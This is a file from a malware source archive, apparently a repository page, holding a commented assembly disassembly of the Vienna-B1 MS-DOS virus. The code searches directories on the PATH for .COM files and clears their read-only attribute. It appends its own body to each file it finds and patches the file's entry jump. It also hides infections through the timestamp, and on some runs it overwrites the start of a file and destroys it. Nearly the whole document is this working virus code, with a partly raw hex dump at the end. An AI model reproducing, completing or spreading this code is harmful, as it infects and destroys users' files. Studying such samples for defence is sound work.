MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.viennaas.asm

332 lines
14 KiB
NASM
Raw Normal View History

2021-01-13 00:04:54 +00:00
; disassembly of vienna-b1 virus
jmp label1
message:
db "ello, world!$" ;*************
mov ah,09h ;print string ; part of *
mov dx,message ;point to string ; original *
int 21h ;call msdos ; com file. *
int 20h ;terminate program ;*************
label1:
push cx ;
mov dx,0312h ;start of variables
cld ;clear direction
mov si,dx ;si = start of variables
add si,000Ah
mov di,0100h ;destination = 0100h
mov cx,0003 ;three bytes to move
repz movsb
mov si,dx ;si = 0312h (start of variables)
mov ah,30h ;get dos version number
int 21h ;call msdos
cmp al,00h ;old version?
jnz label2 ;no
jmp label3 ;yes
label2:
push es ;store extra segment
mov ah,2fh ;get DTA address
int 21h ;call msdos
mov [si+0000h],bx ;save DTA offset
mov [si+0002],es ;save DTA segment
pop es ;restore extra segment address
mov dx,005fh ;
nop
add dx,si ;pointer to new DTA address
mov ah,1ah ;set DTA address
int 21h ;call msdos
push es ;save extra segment address again
push si ;save source index register
mov es,[002ch]
mov di,0000h
label4:
pop si
push si
add si,001ah
lodsb ;get byte from source address
mov cx,8000h ;
repnz scasb
mov cx,0004h ;
label7:
lodsb ;get byte from source
scasb ;store byte
jnz label4 ;jump back till done
loop label7
pop si ;restore source index register
pop es ;and extra segment
mov [si+0016h],di
mov di,si
add di,001fh
mov bx,si
add si,001fh
mov di,si
jmp label5
label13:
cmp word ptr [si+0016h],00h
jnz label5
jmp label6
push ds
push si
es mov ds,[002ch]
mov di,si
es mov si,[di+0016h]
add di,001fh
label10:
lodsb ;get byte
cmp al,3bh
jz label8
cmp al,00h
jz label9
stosb ;store byte
jmp label10
label9:
mov si,0000h
label8:
pop bx
pop ds
mov [bx+0016h],si
cmp byte ptr [di-01h],5ch
jz label5
mov al,5ch
stosb ;store byte
label5:
mov [bx+0018h],di
mov si,bx
add si,0010h
mov cx,0006h
repz movsb
mov si,bx
mov ah,4eh ;search for first match
mov dx,001fh ;pointer to asciiz file spec.-si
nop
add dx,si ;pointer to asciiz file spec.
mov cx,0003h ;attribute to us in search match
int 21h ;call msdos
jmp label11
label14:
mov ah,4fh ;search for next match
int 21h ;call msdos
label11:
jnb label12
jmp label13
label12:
mov ax,[si+0075h]
and al,1fh
cmp al,1fh
jz label14
cmp word ptr [si+0079h],0fa00h
ja label14
cmp word ptr [si+0079h],0ah
jb label14
mov di,[si+0018h]
push si
add si,007dh
label15:
lodsb
stosb
cmp al,00h
jnz label15
pop si
mov ax,4300h ;get file attributes
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to file spec.
int 21h ;call msdos
mov [si+0008h],cx
mov ax,4301 ;set file attributes
and cx,0fffeh ;new attributes
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to asciiz file spec.
int 21h ;call msdos
mov ax,3d02h ;open file (handle)
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to asciiz file spec.
int 21h ;call msdos
jnb label16
jmp label17
label16:
mov bx,ax
mov ax,5700h ;get time and date
int 21h ;call msdos
mov [si+0004],cx ;store time
mov [si+0006],dx ;store date
mov ah,2ch ;get system time
int 21h ;call msdos
and dh,07h
jnz label18
mov ah,40h ;write to file or device (handle)
mov cx,0005h ;number of bytes to write
mov dx,si ;get file spec. address -8ah
add dx,008ah ;add 8ah to get file spec. address
int 21h ;call msdos
jmp label19
nop
label18:
mov ah,3fh ;read file or device (handle)
mov cx,0003h ;number of bytes to read
mov dx,000ah ;point to buffer -si
nop
add dx,si ;pointer to buffer area
int 21h ;call msdos
jb label19
cmp ax,0003h ;number of bytes read
jnz label19
mov ax,4202h ;move file pointer
;offset from end of file
mov cx,0000h ;offset desired
mov dx,0000h ;as above
int 21h ;call msdos
jb label19
mov cx,ax
sub ax,0003h
mov [si+000eh],ax
add cx,02f9h
mov di,si
sub di,01f7h
mov [di],cx
mov ah,40h ;write to file or device (handle)
mov cx,0288h ;number of bytes to write
mov dx,si ;
sub dx,01f9h ;dx = pointer to buffer of data write
int 21h ;call msdos
jb label19
cmp ax,0288h ;288h bytes written?
jnz label19
mov ax,4200h ;move file pointer
;offset from beginning of file
mov cx,0000h ;desired offset
mov dx,0000h ;desired offset
int 21h ;call msdos
jb label19
mov ah,40h ;write to file or device (handle)
mov cx,0003h ;number of bytes to write
mov dx,si ;
add dx,000dh ;pointer to buffer of data write
int 21h ;call msdos
label19:
mov dx,[si+0006h]
mov cx,[si+0004h]
and cx,0ffe0h
or cx,001fh
mov ax,5701h ;set date and time
int 21h ;call msdos
mov ah,3eh ;close file
int 21h ;call msdos
label17:
mov ax,4301h ;set file attributes
mov di,[si+0008h]
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to ascii file spec.
int 21h ;call msdos
label6:
push ds ;save data segment
mov ah,1ah ;set DTA address
mov dx,[si+0000] ;retrieve original DTA
mov ds,[si+0002] ;and data segment of dta
int 21h ;call msdos
pop ds ;restore DTA
label3:
pop cx
xor ax,ax ;clear accumulator
xor bx,bx ;and bx
xor dx,dx ;and dx
xor si,si ;and si
mov di,0100h ;pointer to execution program to be
;run now virus has finished
push di
xor di,di ;clear di
ret 0ffffh ;?
start_of_variables:
0312 80003E ADD BYTE PTR [BX+SI],3E
0315 40 inc ax
0316 D592 AAD 92
0318 8511 TEST dx,[BX+DI]
031A 2000 AND [BX+SI],AL
031C EB0E JMP 032ch ;jump address to place at
;beginning of source program
031E 48 DEC ax
031F E91600 JMP 0338
db "*.COM"
0327 0027 ADD [BX],ah
0329 0022 ADD [BP+SI],ah
032B 03
db "PATH=DANGER!.COM EM.COM"
032C 5041 ADD dx,[BX+SI+41]
032E 54 push SP
032F 48 DEC ax
0330 3D4441 cmp ax,4144
0333 4E DEC SI
0334 47 inc DI
0335 45 inc BP
0336 52 push dx
0337 212E434F AND [4F43],BP
033B 4D DEC BP
033C 00454D ADD [DI+4D],AL
033F 2E CS:
0340 43 inc BX
0341 4F DEC DI
0342 4D DEC BP
0343 0000 ADD [BX+SI],AL
0345 43 inc BX
0346 4F DEC DI
0347 4D DEC BP
0348 0020 ADD [BX+SI],ah
034A 2020 AND [BX+SI],ah
034C 2020 AND [BX+SI],ah
034E 2020 AND [BX+SI],ah
0350 2020 AND [BX+SI],ah
0352 2020 AND [BX+SI],ah
0354 2020 AND [BX+SI],ah
0356 2020 AND [BX+SI],ah
0358 2020 AND [BX+SI],ah
035A 2020 AND [BX+SI],ah
035C 2020 AND [BX+SI],ah
035E 2020 AND [BX+SI],ah
0360 2020 AND [BX+SI],ah
0362 2020 AND [BX+SI],ah
1463:0364 2020 AND [BX+SI],ah
1463:0366 2020 AND [BX+SI],ah
1463:0368 2020 AND [BX+SI],ah
1463:036A 2020 AND [BX+SI],ah
1463:036C 2020 AND [BX+SI],ah
1463:036E 2020 AND [BX+SI],ah
1463:0370 2003 AND [BP+DI],AL
1463:0372 3F AAS
1463:0373 3F AAS
1463:0374 3F AAS
1463:0375 3F AAS
1463:0376 3F AAS
1463:0377 3F AAS
1463:0378 3F AAS
1463:0379 3F AAS
1463:037A 43 inc BX
1463:037B 4F DEC DI
1463:037C 4D DEC BP
1463:037D 0305 ADD ax,[DI]
1463:037F 001F ADD [BX],BL
1463:0381 0020 ADD [BX+SI],ah
1463:0383 64 DB 64
1463:0384 7269 JB 03EF
1463:0386 20D5 AND CH,DL
1463:0388 92 XCHG dx,ax
1463:0389 8511 TEST dx,[BX+DI]
1463:038B 1900 SBB [BX+SI],ax
1463:038D 0000 ADD [BX+SI],AL
1463:038F 44 inc SP
1463:0390 41 inc cx
1463:0391 4E DEC SI
1463:0392 47 inc DI
1463:0393 45 inc BP
1463:0394 52 push dx
1463:0395 212E434F AND [4F43],BP
1463:0399 4D DEC BP
1463:039A 0000 ADD [BX+SI],AL
1463:039C EA0B021358 JMP 5813:020B